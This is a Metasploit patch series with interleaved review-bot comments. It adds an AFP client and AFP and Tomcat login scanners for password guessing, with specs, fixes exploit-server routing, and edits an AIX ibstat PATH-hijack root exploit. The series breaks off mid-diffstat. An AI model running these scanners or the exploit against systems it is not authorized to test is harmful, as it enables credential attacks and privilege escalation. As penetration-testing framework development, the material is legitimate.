@@ -0,0 +1,323 @@ +# -*- coding: binary -*- +require 'msf/core' +require 'msf/core/exploit/tcp' + +module Metasploit + module Framework + module AFP + module Client + + def next_id + @request_id ||= -1 + @request_id += 1 + + @request_id + end + + def get_info + packet = "\00" # Flag: Request + packet << "\x03" # Command: FPGetSrvrInfo + packet << [next_id].pack('n') # requestID + packet << "\x00\x00\x00\x00" # Data offset + packet << "\x00\x00\x00\x00" # Length + packet << "\x00\x00\x00\x00" # Reserved + + sock.put(packet) + + response = sock.timed_read(1024) + return parse_info_response(response) + end + + def open_session + packet = "\00" # Flag: Request + packet << "\x04" # Command: DSIOpenSession + packet << [next_id].pack('n') # requestID + packet << "\x00\x00\x00\x00" # Data offset + packet << "\x00\x00\x00\x06" # Length + packet << "\x00\x00\x00\x00" # Reserved + packet << "\x01" # Attention Quantum + packet << "\x04" # Length + packet << "\x00\x00\x04\x00" # 1024 + + sock.put(packet) + + response = sock.timed_read(1024) + return parse_open_session_response(response) + end + + def login(user, pass) + if user == '' + return no_user_authent_login + end + + p = OpenSSL::BN.new("BA2873DFB06057D43F2024744CEEE75B", 16) + g = OpenSSL::BN.new("7", 10) + ra = OpenSSL::BN.new('86F6D3C0B0D63E4B11F113A2F9F19E3BBBF803F28D30087A1450536BE979FD42', 16) + ma = g.mod_exp(ra, p) + + padded_user = (user.length + 1) % 2 != 0 ? 
user + "\x00" : user + bin_user = [padded_user.length, padded_user].pack("Ca*") + + length = 18 + bin_user.length + ma.to_s(2).length + + packet = "\00" # Flag: Request + packet << "\x02" # Command: DSICommand + packet << [next_id].pack('n') # requestID + packet << "\x00\x00\x00\x00" # Data offset + packet << [length].pack('N') # Length (42) + packet << "\x00\x00\x00\x00" # Reserved + packet << "\x12" # AFPCommand: FPLogin (18) + packet << "\x06\x41\x46\x50\x33\x2e\x31" # AFPVersion: AFP3.1 + packet << "\x09\x44\x48\x43\x41\x53\x54\x31\x32\x38" #UAM: DHCAST128 + packet << bin_user # username + packet << ma.to_s(2) # random number + + sock.put(packet) + + begin + response = sock.timed_read(1024, self.login_timeout) + rescue Timeout::Error + #vprint_error("AFP #{rhost}:#{rport} Login timeout (AFP server delay response for 20 - 22 seconds after 7 incorrect logins)") + return :connection_error + end + + flags, command, request_id, error_code, length, reserved = parse_header(response) + + case error_code + when -5001 #kFPAuthContinue + return parse_login_response_add_send_login_count(response, {:p => p, :g => g, :ra => ra, :ma => ma, + :password => pass, :user => user}) + when -5023 #kFPUserNotAuth (User dosen't exists) + #print_status("AFP #{rhost}:#{rport} User #{user} dosen't exists") + return :skip_user + else + return :connection_error + end + + end + + def close_session + packet = "\00" # Flag: Request + packet << "\x01" # Command: DSICloseSession + packet << [next_id].pack('n') # requestID + packet << "\x00\x00\x00\x00" #Data offset + packet << "\x00\x00\x00\x00" #Length + packet << "\x00\x00\x00\x00" #Reserved + + sock.put(packet) + end + + def no_user_authent_login + packet = "\00" # Flag: Request + packet << "\x02" # Command: DSICommand + packet << [next_id].pack('n') # requestID + packet << "\x00\x00\x00\x00" # Data offset + packet << "\x00\x00\x00\x18" # Length (24) + packet << "\x00\x00\x00\x00" # Reserved + packet << "\x12" # AFPCommand: FPLogin (18) + 
packet << "\x06\x41\x46\x50\x33\x2e\x31" #AFP3.1 + packet << "\x0f\x4e\x6f\x20\x55\x73\x65\x72\x20\x41\x75\x74\x68\x65\x6e\x74" #UAM: No User Authent + + sock.put(packet) + + begin + response = sock.timed_read(1024, self.login_timeout) + rescue Timeout::Error + vprint_error("AFP #{rhost}:#{rport} Login timeout (AFP server delay response for 20 - 22 seconds after 7 incorrect logins)") + return :connection_error + end + + flags, command, request_id, error_code, length, reserved = parse_header(response) + + if error_code == 0 + return :true + else + return false + end + end + + def parse_login_response_add_send_login_count(response, data) + dhx_s2civ = 'CJalbert' + dhx_c2civ = 'LWallace' + + flags, command, request_id, error_code, length, reserved = parse_header(response) + body = get_body(response, length) + id, mb, enc_data = body.unpack("nH32a*") + + mb = OpenSSL::BN.new(mb, 16) + k = mb.mod_exp(data[:ra], data[:p] ) + + cipher = OpenSSL::Cipher.new('cast5-cbc').decrypt + cipher.key = k.to_s(2) + cipher.iv = dhx_s2civ + cipher.padding = 0 + + nonce = cipher.update(enc_data) + nonce << cipher.final + nonce = nonce[0..15] + nonce = OpenSSL::BN.new(nonce, 2) + 1 + + plain_text = nonce.to_s(2) + data[:password].ljust(64, "\x00") + cipher = OpenSSL::Cipher.new('cast5-cbc').encrypt + cipher.key = k.to_s(2) + cipher.iv = dhx_c2civ + auth_response = cipher.update(plain_text) + auth_response << cipher.final + + packet = "\00" # Flag: Request + packet << "\x02" # Command: DSICommand + packet << [next_id].pack('n') # requestID + packet << "\x00\x00\x00\x00" # Data offset + packet << [auth_response.length + 2].pack("N") # Length + packet << "\x00\x00\x00\x00" # Reserved + packet << "\x13" # AFPCommand: FPLoginCont (19) + packet << "\x00" + packet << [id].pack('n') + packet << auth_response + + sock.put(packet) + + begin + response = sock.timed_read(1024, self.login_timeout) + rescue Timeout::Error + vprint_error("AFP #{rhost}:#{rport} Login timeout (AFP server delay response 
for 20 - 22 seconds after 7 incorrect logins)") + return :connection_error + end + + flags, command, request_id, error_code, length, reserved = parse_header(response) + if error_code == 0 + return true + else + return false + end + end + + def parse_open_session_response(response) + _, _, _, error_code, _, _ = parse_header(response) + return error_code == 0 ? true : false + end + + def parse_info_response(response) + parsed_data = {} + + flags, command, request_id, error_code, length, reserved = parse_header(response) + raise "AFP #{rhost}:#{rport} Server response with error" if error_code != 0 + body = get_body(response, length) + machine_type_offset, afp_versions_offset, uam_count_offset, icon_offset, server_flags = + body.unpack('nnnnn') + + server_name_length = body.unpack('@10C').first + parsed_data[:server_name] = body.unpack("@11A#{server_name_length}").first + + pos = 11 + server_name_length + pos += 1 if pos % 2 != 0 #padding + + server_signature_offset, network_addresses_offset, directory_names_offset, + utf8_servername_offset = body.unpack("@#{pos}nnnn") + + parsed_data[:machine_type] = read_pascal_string(body, machine_type_offset) + parsed_data[:versions] = read_array(body, afp_versions_offset) + parsed_data[:uams] = read_array(body, uam_count_offset) + # skiped icon + parsed_data[:server_flags] = parse_flags(server_flags) + parsed_data[:signature] = body.unpack("@#{server_signature_offset}H32").first + + network_addresses = read_array(body, network_addresses_offset, true) + parsed_data[:network_addresses] = parse_network_addresses(network_addresses) + # skiped directory names + #Error catching for offset issues on this field. 
Need better error ahndling all through here + begin + parsed_data[:utf8_server_name] = read_utf8_pascal_string(body, utf8_servername_offset) + rescue + parsed_data[:utf8_server_name] = "N/A" + end + + return parsed_data + end + + def parse_header(packet) + header = packet.unpack('CCnNNN') #ruby 1.8.7 don't support unpacking signed integers in big-endian order + header[3] = packet[4..7].reverse.unpack("l").first + return header + end + + def get_body(packet, body_length) + body = packet[16..body_length + 15] + raise "AFP #{rhost}:#{rport} Invalid body length" if body.length != body_length + return body + end + + def read_pascal_string(str, offset) + length = str.unpack("@#{offset}C").first + return str.unpack("@#{offset + 1}A#{length}").first + end + + def read_utf8_pascal_string(str, offset) + length = str.unpack("@#{offset}n").first + return str[offset + 2..offset + length + 1] + end + + def read_array(str, offset, afp_network_address=false) + size = str.unpack("@#{offset}C").first + pos = offset + 1 + + result = [] + size.times do + result << read_pascal_string(str, pos) + pos += str.unpack("@#{pos}C").first + pos += 1 unless afp_network_address + end + return result + end + + def parse_network_addresses(network_addresses) + parsed_addreses = [] + network_addresses.each do |address| + case address.unpack('C').first + when 0 #Reserved + next + when 1 # Four-byte IP address + parsed_addreses << IPAddr.ntop(address[1..4]).to_s + when 2 # Four-byte IP address followed by a two-byte port number + parsed_addreses << "#{IPAddr.ntop(address[1..4])}:#{address[5..6].unpack("n").first}" + when 3 # DDP address (depricated) + next + when 4 # DNS name (maximum of 254 bytes) + parsed_addreses << address[1..address.length - 1] + when 5 # This functionality is deprecated. 
+ next + when 6 # IPv6 address (16 bytes) + parsed_addreses << "[#{IPAddr.ntop(address[1..16])}]" + when 7 # IPv6 address (16 bytes) followed by a two-byte port number + parsed_addreses << "[#{IPAddr.ntop(address[1..16])}]:#{address[17..18].unpack("n").first}" + else # Something wrong? + raise "Error parsing network addresses" + end + end + return parsed_addreses + end + + def parse_flags(flags) + flags = flags.to_s(2) + result = {} + result['Super Client'] = flags[0,1] == '1' ? true : false + result['UUIDs'] = flags[5,1] == '1' ? true : false + result['UTF8 Server Name'] = flags[6,1] == '1' ? true : false + result['Open Directory'] = flags[7,1] == '1' ? true : false + result['Reconnect'] = flags[8,1] == '1' ? true : false + result['Server Notifications'] = flags[9,1] == '1' ? true : false + result['TCP/IP'] = flags[10,1] == '1' ? true : false + result['Server Signature'] = flags[11,1] == '1' ? true : false + result['Server Messages'] = flags[12,1] == '1' ? true : false + result['Password Saving Prohibited'] = flags[13,1] == '1' ? true : false + result['Password Changing'] = flags[14,1] == '1' ? true : false + result['Copy File'] = flags[5,1] == '1' ? true : false + return result + end + + end + end + + end +end + diff --git a/lib/metasploit/framework/login_scanner/afp.rb b/lib/metasploit/framework/login_scanner/afp.rb new file mode 100644 index 0000000000..548d1de91d --- /dev/null +++ b/lib/metasploit/framework/login_scanner/afp.rb 
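Review bot: `no_user_authent_login` returns the symbol `:true` when `error_code == 0` rather than `true`; the login scanner added in this same commit tests `success == true`, so a server that accepts the No User Authent login is reported as `:failed`. Change that line to `return true`. In `parse_flags`, `flags.to_s(2)` is not zero-padded, so whenever the high bits of the 16-bit flags word are clear the string is shorter than 16 characters and every positional lookup (`flags[0,1]`, `flags[5,1]`, …) reads the wrong bit; use `flags = flags.to_s(2).rjust(16, '0')`, and note that `'Copy File'` reuses index 5, the same position already assigned to `'UUIDs'`. A short YARD comment on `parse_header` explaining why byte 4..7 is reversed and unpacked with the native `"l"` (the Ruby 1.8.7 remark in the inline comment) would help the next maintainer, since the result depends on the host being little-endian.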
@@ -0,0 +1,43 @@
+require 'metasploit/framework/tcp/client'
+require 'metasploit/framework/afp/client'
+require 'metasploit/framework/login_scanner/base'
+require 'metasploit/framework/login_scanner/rex_socket'
+
+module Metasploit
+ module Framework
+ module LoginScanner
+
+ # This is the LoginScanner class for dealing with Apple Filing
+ # Protocol.
+ class AFP
+ include Metasploit::Framework::LoginScanner::Base
+ include Metasploit::Framework::LoginScanner::RexSocket
+ include Metasploit::Framework::Tcp::Client
+ include Metasploit::Framework::AFP::Client
+
+ # @!attribute login_timeout
+ # @return [Integer] Number of seconds to wait before giving up
+ attr_accessor :login_timeout
+
+ def attempt_login(credential)
+ begin
+ connect
+ rescue Rex::ConnectionError
+ status = :connection_error
+ else
+ success = login(credential.public, credential.private)
+ status = (success == true) ? :success : :failed
+ end
+
+ Result.new(credential: credential, status: status)
+ end
+
+ def set_sane_defaults
+ self.port = 548 if self.port.nil?
+ self.max_send_size = 0 if self.max_send_size.nil?
+ self.send_delay = 0 if self.send_delay.nil?
+ end
+ end
+ end
+ end
+end
diff --git a/lib/metasploit/framework/login_scanner/result.rb b/lib/metasploit/framework/login_scanner/result.rb
index afa870839a..ad8519ea6d 100644
--- a/lib/metasploit/framework/login_scanner/result.rb
+++ b/lib/metasploit/framework/login_scanner/result.rb
@@ -28,7 +28,7 @@ module Metasploit
 # @option opts [Symbol] :status The status code returned
 def initialize(opts= {})
 @access_level = opts.fetch(:access_level, nil)
- @credential = opts.fetch(:credential)
+ @credential = opts.fetch(:credential)
 @proof = opts.fetch(:proof, nil)
 @status = opts.fetch(:status)
 end
diff --git a/spec/lib/metasploit/framework/afp/client_spec.rb b/spec/lib/metasploit/framework/afp/client_spec.rb
new file mode 100644
index 0000000000..e69de29bb2
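Review bot: `attempt_login` maps every return value of `login` other than `true` to `:failed`, but `login` (in afp/client.rb from this same commit) returns `:connection_error` on a read timeout and `:skip_user` for an unknown user, so a timed-out handshake is recorded as a wrong password rather than a connection problem; a small `case success when true then :success when :connection_error then :connection_error else :failed end` would preserve that distinction. `set_sane_defaults` gives `port`, `max_send_size` and `send_delay` defaults but not `login_timeout`, which `login` passes straight to `sock.timed_read`; if a caller never sets it the read runs with a `nil` timeout (what `timed_read` does with `nil` is not visible here — verify). The `# @!attribute login_timeout` YARD block should state the default once one is chosen.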
diff --git a/spec/lib/metasploit/framework/login_scanner/afp_spec.rb b/spec/lib/metasploit/framework/login_scanner/afp_spec.rb new file mode 100644 index 0000000000..180f80cc5c --- /dev/null +++ b/spec/lib/metasploit/framework/login_scanner/afp_spec.rb @@ -0,0 +1,16 @@ + +require 'spec_helper' +require 'metasploit/framework/login_scanner/afp' + +describe Metasploit::Framework::LoginScanner::AFP do + + subject(:http_scanner) { described_class.new } + + it_behaves_like 'Metasploit::Framework::LoginScanner::Base' + it_behaves_like 'Metasploit::Framework::LoginScanner::RexSocket' + + it { should respond_to :login_timeout } + + +end + From 8be35b90f4a62954656077102e35ef5899fe9667 Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 20 May 2014 17:44:41 -0500 Subject: [PATCH 24/47] Add some more specs for AFP login scanner --- lib/metasploit/framework/login_scanner/afp.rb | 2 +- .../framework/login_scanner/afp_spec.rb | 45 ++++++++++++++++++- 2 files changed, 45 insertions(+), 2 deletions(-) diff --git a/lib/metasploit/framework/login_scanner/afp.rb b/lib/metasploit/framework/login_scanner/afp.rb index 548d1de91d..faa5985c48 100644 --- a/lib/metasploit/framework/login_scanner/afp.rb +++ b/lib/metasploit/framework/login_scanner/afp.rb @@ -22,7 +22,7 @@ module Metasploit def attempt_login(credential) begin connect - rescue Rex::ConnectionError + rescue Rex::ConnectionError, EOFError, Timeout::Error status = :connection_error else success = login(credential.public, credential.private) diff --git a/spec/lib/metasploit/framework/login_scanner/afp_spec.rb b/spec/lib/metasploit/framework/login_scanner/afp_spec.rb index 180f80cc5c..965cfa0f1a 100644 --- a/spec/lib/metasploit/framework/login_scanner/afp_spec.rb +++ b/spec/lib/metasploit/framework/login_scanner/afp_spec.rb 
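Review bot: The widened `rescue Rex::ConnectionError, EOFError, Timeout::Error` only protects `connect`; `success = login(...)` sits in the `else` clause of the same `begin`, and Ruby does not route exceptions raised inside `else` through that `rescue`, so an `EOFError` from `sock.put` or from the reads during the AFP exchange still escapes `attempt_login` (the `login` helper only rescues `Timeout::Error` around its own `timed_read` calls, as far as the earlier hunk shows). Moving the `login` call into the `begin` body, with the status assignment after it, would give those errors the same `:connection_error` outcome the new specs in this commit expect. The enclosing `attempt_login` method starts and ends outside the hunk.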
@@ -4,13 +4,56 @@ require 'metasploit/framework/login_scanner/afp' describe Metasploit::Framework::LoginScanner::AFP do - subject(:http_scanner) { described_class.new } + subject(:scanner) { described_class.new } it_behaves_like 'Metasploit::Framework::LoginScanner::Base' it_behaves_like 'Metasploit::Framework::LoginScanner::RexSocket' it { should respond_to :login_timeout } + describe "#attempt_login" do + let(:pub_blank) do + Metasploit::Framework::LoginScanner::Credential.new( + paired: true, + public: "public", + private: '' + ) + end + + it "Rex::ConnectionError should result in status :connection_error" do + expect(scanner).to receive(:connect).and_raise(Rex::ConnectionError) + result = scanner.attempt_login(pub_blank) + + expect(result).to be_kind_of(Metasploit::Framework::LoginScanner::Result) + expect(result.status).to eq(:connection_error) + end + + it "Timeout::Error should result in status :connection_error" do + expect(scanner).to receive(:connect).and_raise(Timeout::Error) + result = scanner.attempt_login(pub_blank) + + expect(result).to be_kind_of(Metasploit::Framework::LoginScanner::Result) + expect(result.status).to eq(:connection_error) + end + + it "EOFError should result in status :connection_error" do + expect(scanner).to receive(:connect).and_raise(EOFError) + result = scanner.attempt_login(pub_blank) + + expect(result).to be_kind_of(Metasploit::Framework::LoginScanner::Result) + expect(result.status).to eq(:connection_error) + end + + it "considers :skip_user to mean failure" do + expect(scanner).to receive(:connect) + expect(scanner).to receive(:login).and_return(:skip_user) + result = scanner.attempt_login(pub_blank) + + expect(result).to be_kind_of(Metasploit::Framework::LoginScanner::Result) + expect(result.status).to eq(:failed) + end + + end end From 5d1a0397edb135d0eb456b73b52eb1be3f9942a2 Mon Sep 17 00:00:00 2001 
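Review bot: The new `#attempt_login` block covers three connection failures and the `:skip_user` case but has no example for the success path, so a regression that maps a `true` return from `login` to `:failed` would still pass this spec. Add an example mirroring the `:skip_user` one: `expect(scanner).to receive(:login).and_return(true)` followed by `expect(result.status).to eq(:success)`. Because `attempt_login` compares with `== true`, a truthy non-`true` return from `login` is also reported as `:failed`; if that is intended, an example pinning it would document the contract.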
From: James Lee Date: Wed, 21 May 2014 14:28:54 -0500 Subject: [PATCH 25/47] Add Tomcat login scanner --- .../framework/login_scanner/tomcat.rb | 25 ++++++ .../framework/login_scanner/http_spec.rb | 78 +------------------ .../framework/login_scanner/tomcat_spec.rb | 11 +++ .../framework/login_scanner/winrm_spec.rb | 8 +- .../framework/login_scanner/http.rb | 78 +++++++++++++++++++ 5 files changed, 118 insertions(+), 82 deletions(-) create mode 100644 lib/metasploit/framework/login_scanner/tomcat.rb create mode 100644 spec/lib/metasploit/framework/login_scanner/tomcat_spec.rb create mode 100644 spec/support/shared/examples/lib/metasploit/framework/login_scanner/http.rb diff --git a/lib/metasploit/framework/login_scanner/tomcat.rb b/lib/metasploit/framework/login_scanner/tomcat.rb new file mode 100644 index 0000000000..4fa8c9af7c --- /dev/null +++ b/lib/metasploit/framework/login_scanner/tomcat.rb @@ -0,0 +1,25 @@ + +require 'metasploit/framework/login_scanner/http' + +module Metasploit + module Framework + module LoginScanner + + # Tomcat Manager login scanner + class Tomcat < HTTP + + DEFAULT_PORT = 8180 + + # (see Base#set_sane_defaults) + def set_sane_defaults + self.uri = "/manager/html" if self.uri.nil? + self.method = "GET" if self.method.nil? + + super + end + + end + end + end +end + diff --git a/spec/lib/metasploit/framework/login_scanner/http_spec.rb b/spec/lib/metasploit/framework/login_scanner/http_spec.rb index fc6510b654..5b33e8f980 100644 --- a/spec/lib/metasploit/framework/login_scanner/http_spec.rb +++ b/spec/lib/metasploit/framework/login_scanner/http_spec.rb 
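Review bot: `DEFAULT_PORT = 8180` is declared on `Tomcat` but `set_sane_defaults` never reads it; the port is left to `super`, so the override only takes effect if `HTTP#set_sane_defaults` (outside this hunk) resolves the constant through `self.class::DEFAULT_PORT` rather than lexically. Either document that dependency, e.g. `# Overrides HTTP::DEFAULT_PORT; HTTP#set_sane_defaults must read it via self.class::DEFAULT_PORT`, or make it explicit here with `self.port = DEFAULT_PORT if self.port.nil?` before `super`. 8180 is also not the 8080 most Tomcat installs listen on; if it was chosen to match a distribution package default, a comment saying so would save users an RPORT surprise.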
@@ -4,84 +4,8 @@ require 'metasploit/framework/login_scanner/http' describe Metasploit::Framework::LoginScanner::HTTP do - subject(:http_scanner) { described_class.new } - it_behaves_like 'Metasploit::Framework::LoginScanner::Base' it_behaves_like 'Metasploit::Framework::LoginScanner::RexSocket' - - it { should respond_to :uri } - it { should respond_to :method } - - context "#set_sane_defaults" do - - context "without ssl, without port" do - it "should default :port to #{described_class::DEFAULT_PORT}" do - expect(http_scanner.ssl).to be_false - expect(http_scanner.port).to eq(described_class::DEFAULT_PORT) - end - end - - context "with ssl, without port" do - subject(:http_scanner) { described_class.new(ssl:true) } - it "should set :port to default ssl port (#{described_class::DEFAULT_SSL_PORT})" do - expect(http_scanner.ssl).to be_true - expect(http_scanner.port).to eq(described_class::DEFAULT_SSL_PORT) - end - end - - context "without ssl, with default port" do - subject(:http_scanner) { described_class.new(port:described_class::DEFAULT_PORT) } - it "should set ssl to false" do - expect(http_scanner.port).to eq(described_class::DEFAULT_PORT) - expect(http_scanner.ssl).to be_false - end - end - - context "without ssl, with default SSL port" do - subject(:http_scanner) { described_class.new(port:described_class::DEFAULT_SSL_PORT) } - it "should set ssl to true" do - expect(http_scanner.ssl).to be_true - expect(http_scanner.port).to eq(described_class::DEFAULT_SSL_PORT) - end - end - - context "without ssl, with non-default port" do - subject(:http_scanner) { described_class.new(port:0) } - it "should not set ssl" do - expect(http_scanner.ssl).to be_nil - expect(http_scanner.port).to eq(0) - end - end - - end - - context "#attempt_login" do - let(:pub_blank) { - Metasploit::Framework::LoginScanner::Credential.new( - paired: true, - public: "public", - private: '' - ) - } - - it "Rex::ConnectionError should result in status :connection_error" do - 
allow_any_instance_of(Rex::Proto::Http::Client).to receive(:connect).and_raise(Rex::ConnectionError) - - expect(http_scanner.attempt_login(pub_blank).status).to eq(:connection_error) - end - - it "Timeout::Error should result in status :connection_error" do - allow_any_instance_of(Rex::Proto::Http::Client).to receive(:connect).and_raise(Timeout::Error) - - expect(http_scanner.attempt_login(pub_blank).status).to eq(:connection_error) - end - - it "EOFError should result in status :connection_error" do - allow_any_instance_of(Rex::Proto::Http::Client).to receive(:connect).and_raise(EOFError) - - expect(http_scanner.attempt_login(pub_blank).status).to eq(:connection_error) - end - - end + it_behaves_like 'Metasploit::Framework::LoginScanner::HTTP' end diff --git a/spec/lib/metasploit/framework/login_scanner/tomcat_spec.rb b/spec/lib/metasploit/framework/login_scanner/tomcat_spec.rb new file mode 100644 index 0000000000..4a6607df26 --- /dev/null +++ b/spec/lib/metasploit/framework/login_scanner/tomcat_spec.rb @@ -0,0 +1,11 @@ + +require 'spec_helper' +require 'metasploit/framework/login_scanner/tomcat' + +describe Metasploit::Framework::LoginScanner::Tomcat do + + it_behaves_like 'Metasploit::Framework::LoginScanner::Base' + it_behaves_like 'Metasploit::Framework::LoginScanner::RexSocket' + it_behaves_like 'Metasploit::Framework::LoginScanner::HTTP' + +end diff --git a/spec/lib/metasploit/framework/login_scanner/winrm_spec.rb b/spec/lib/metasploit/framework/login_scanner/winrm_spec.rb index 59295df7fa..13d0637cb9 100644 --- a/spec/lib/metasploit/framework/login_scanner/winrm_spec.rb +++ b/spec/lib/metasploit/framework/login_scanner/winrm_spec.rb 
@@ -4,15 +4,13 @@ require 'metasploit/framework/login_scanner/winrm' describe Metasploit::Framework::LoginScanner::WinRM do - subject(:winrm_scanner) { described_class.new } - it_behaves_like 'Metasploit::Framework::LoginScanner::Base' it_behaves_like 'Metasploit::Framework::LoginScanner::RexSocket' - - it { should respond_to :uri } - it { should respond_to :method } + it_behaves_like 'Metasploit::Framework::LoginScanner::HTTP' context "#method=" do + subject(:winrm_scanner) { described_class.new } + it "should raise, warning that the :method can't be changed" do expect { winrm_scanner.method = "GET" }.to raise_error(RuntimeError) expect(winrm_scanner.method).to eq("POST") diff --git a/spec/support/shared/examples/lib/metasploit/framework/login_scanner/http.rb b/spec/support/shared/examples/lib/metasploit/framework/login_scanner/http.rb new file mode 100644 index 0000000000..44c1fab326 --- /dev/null +++ b/spec/support/shared/examples/lib/metasploit/framework/login_scanner/http.rb 
@@ -0,0 +1,78 @@ +shared_examples_for 'Metasploit::Framework::LoginScanner::HTTP' do + subject(:http_scanner) { described_class.new } + + it { should respond_to :uri } + it { should respond_to :method } + + context "#set_sane_defaults" do + + context "without ssl, without port" do + it "should default :port to #{described_class::DEFAULT_PORT}" do + expect(http_scanner.ssl).to be_false + expect(http_scanner.port).to eq(described_class::DEFAULT_PORT) + end + end + + context "with ssl, without port" do + subject(:http_scanner) { described_class.new(ssl:true) } + it "should set :port to default ssl port (#{described_class::DEFAULT_SSL_PORT})" do + expect(http_scanner.ssl).to be_true + expect(http_scanner.port).to eq(described_class::DEFAULT_SSL_PORT) + end + end + + context "without ssl, with default port" do + subject(:http_scanner) { described_class.new(port:described_class::DEFAULT_PORT) } + it "should set ssl to false" do + expect(http_scanner.port).to eq(described_class::DEFAULT_PORT) + expect(http_scanner.ssl).to be_false + end + end + + context "without ssl, with default SSL port" do + subject(:http_scanner) { described_class.new(port:described_class::DEFAULT_SSL_PORT) } + it "should set ssl to true" do + expect(http_scanner.ssl).to be_true + expect(http_scanner.port).to eq(described_class::DEFAULT_SSL_PORT) + end + end + + context "without ssl, with non-default port" do + subject(:http_scanner) { described_class.new(port:0) } + it "should not set ssl" do + expect(http_scanner.ssl).to be_nil + expect(http_scanner.port).to eq(0) + end + end + + end + + context "#attempt_login" do + let(:pub_blank) { + Metasploit::Framework::LoginScanner::Credential.new( + paired: true, + public: "public", + private: '' + ) + } + + it "Rex::ConnectionError should result in status :connection_error" do + allow_any_instance_of(Rex::Proto::Http::Client).to receive(:connect).and_raise(Rex::ConnectionError) + + expect(http_scanner.attempt_login(pub_blank).status).to 
eq(:connection_error) + end + + it "Timeout::Error should result in status :connection_error" do + allow_any_instance_of(Rex::Proto::Http::Client).to receive(:connect).and_raise(Timeout::Error) + + expect(http_scanner.attempt_login(pub_blank).status).to eq(:connection_error) + end + + it "EOFError should result in status :connection_error" do + allow_any_instance_of(Rex::Proto::Http::Client).to receive(:connect).and_raise(EOFError) + + expect(http_scanner.attempt_login(pub_blank).status).to eq(:connection_error) + end + + end +end From 1dbe972377f830db390d4a41e913c64b8a96d61b Mon Sep 17 00:00:00 2001 From: sinn3r Date: Thu, 22 May 2014 12:18:49 -0500 Subject: [PATCH 26/47] Fix URIPATH / for BrowserExploitServer [SeeRM #8804] Fix URIPATH / for BrowserExploitServer --- lib/msf/core/exploit/remote/browser_exploit_server.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/exploit/remote/browser_exploit_server.rb b/lib/msf/core/exploit/remote/browser_exploit_server.rb index d1782616e1..6cd891aa84 100644 --- a/lib/msf/core/exploit/remote/browser_exploit_server.rb +++ b/lib/msf/core/exploit/remote/browser_exploit_server.rb @@ -439,7 +439,7 @@ module Msf # def on_request_uri(cli, request) case request.uri - when get_resource.chomp("/") + when '/', get_resource.chomp("/") # # This is the information gathering stage # From 28459299b205934897294a235f951e700a89dece Mon Sep 17 00:00:00 2001 From: mercd Date: Thu, 22 May 2014 14:16:04 -0700 Subject: [PATCH 27/47] Update ibstat_path.rb Add interface detection, defaulting to en0. --- modules/exploits/aix/local/ibstat_path.rb | 16 +++++++++++++++- 1 file changed, 15 insertions(+), 1 deletion(-) diff --git a/modules/exploits/aix/local/ibstat_path.rb b/modules/exploits/aix/local/ibstat_path.rb index cb424c1cfe..1ac45dfa97 100644 --- a/modules/exploits/aix/local/ibstat_path.rb +++ b/modules/exploits/aix/local/ibstat_path.rb 
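Review bot: The `#set_sane_defaults` contexts in the new shared example infer `ssl` from the port but never pass an explicit `ssl: false`, so nothing pins whether `described_class.new(ssl: false, port: described_class::DEFAULT_SSL_PORT)` keeps the caller's plaintext choice or silently switches to TLS. A context such as `"with ssl explicitly false, with default SSL port"` asserting `expect(http_scanner.ssl).to be_false` would make that decision explicit for every class that includes this group. The `#attempt_login` contexts cover only the three error classes; one success example would complete the contract.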
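Review bot: Adding `'/'` as an unconditional alternative in the `when` makes the root path serve the information-gathering stage even when `URIPATH` is set to something other than `/`, which is broader than the commit title describes. If the intent is only the case where `get_resource.chomp("/")` collapses to an empty string, compute the resource once: `resource = get_resource.chomp("/")` then `when (resource.empty? ? '/' : resource)`. `on_request_uri` continues outside the hunk.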
@@ -110,8 +110,22 @@ chmod 4555 #{root_file} cmd_exec("PATH=#{datastore["WritableDir"]}:$PATH") cmd_exec("export PATH") + print_status("Finding interface name...") + iface = "" + cmd_exec("lsdev -Cc if").each_line do |line| + if line.match(/^[a-z]+[0-9]+\s+Available/) and not line.match(/^lo[0-9]/) + iface = line.split(/\s+/)[0] + print_status("Found interface #{iface}.") + break + end + end + if iface == "" + iface = "en0" + print_status("Found no interface, defaulting to en0.") + end + print_status("Triggering vulnerablity...") - cmd_exec("/usr/bin/ibstat -a -i en0 2>/dev/null >/dev/null") + cmd_exec("/usr/bin/ibstat -a -i #{iface} 2>/dev/null >/dev/null") # The $PATH variable must be restored before the payload is executed # in cases where an euid root shell was gained From 8d4d40b8ba5b0c5d5377895369a0173754a9dda3 Mon Sep 17 00:00:00 2001 
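Review bot: The interface-detection loop mixes `and`/`not` with a mutable sentinel and tests `iface == ""`; idiomatic Ruby would use `&&`/`!` and `iface.empty?`, or drop the loop for `find`: `line = cmd_exec("lsdev -Cc if").each_line.find { |l| l =~ /^[a-z]+[0-9]+\s+Available/ && l !~ /^lo[0-9]/ }` and `iface = line ? line.split(/\s+/).first : "en0"`, with the two `print_status` calls after the assignment. Since `iface` is then interpolated into the `ibstat` command line, the anchored `^[a-z]+[0-9]+` match is what keeps that value a plain device name; a one-line comment saying so would stop a later edit from loosening the pattern. The enclosing method continues on both sides of the hunk.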
From: Christian Mehlmauer Date: Sat, 24 May 2014 00:34:46 +0200 Subject: [PATCH 28/47] Resolved some Set-Cookie warnings --- modules/exploits/multi/http/wikka_spam_exec.rb | 11 ++++++----- modules/exploits/multi/http/zabbix_script_exec.rb | 2 +- .../exploits/multi/php/php_unserialize_zval_cookie.rb | 2 +- modules/exploits/unix/http/lifesize_room.rb | 4 ++-- modules/exploits/unix/webapp/foswiki_maketext.rb | 6 +++--- modules/exploits/unix/webapp/hastymail_exec.rb | 2 +- .../unix/webapp/invision_pboard_unserialize_exec.rb | 2 +- .../exploits/unix/webapp/joomla_media_upload_exec.rb | 4 ++-- modules/exploits/unix/webapp/nagios_graph_explorer.rb | 2 +- .../unix/webapp/openemr_sqli_privesc_upload.rb | 2 +- modules/exploits/unix/webapp/phpmyadmin_config.rb | 2 +- modules/exploits/unix/webapp/sphpblog_file_upload.rb | 4 ++-- .../exploits/unix/webapp/sugarcrm_unserialize_exec.rb | 4 ++-- modules/exploits/unix/webapp/trixbox_langchoice.rb | 4 ++-- modules/exploits/unix/webapp/twiki_maketext.rb | 6 +++--- .../exploits/unix/webapp/vbulletin_vote_sqli_exec.rb | 2 +- modules/exploits/unix/webapp/webmin_show_cgi_exec.rb | 8 ++++---- .../unix/webapp/wp_google_document_embedder_exec.rb | 6 +----- modules/exploits/unix/webapp/zpanel_username_exec.rb | 4 ++-- modules/exploits/windows/http/osb_uname_jlist.rb | 4 ++-- .../windows/http/solarwinds_storage_manager_sql.rb | 4 ++-- 21 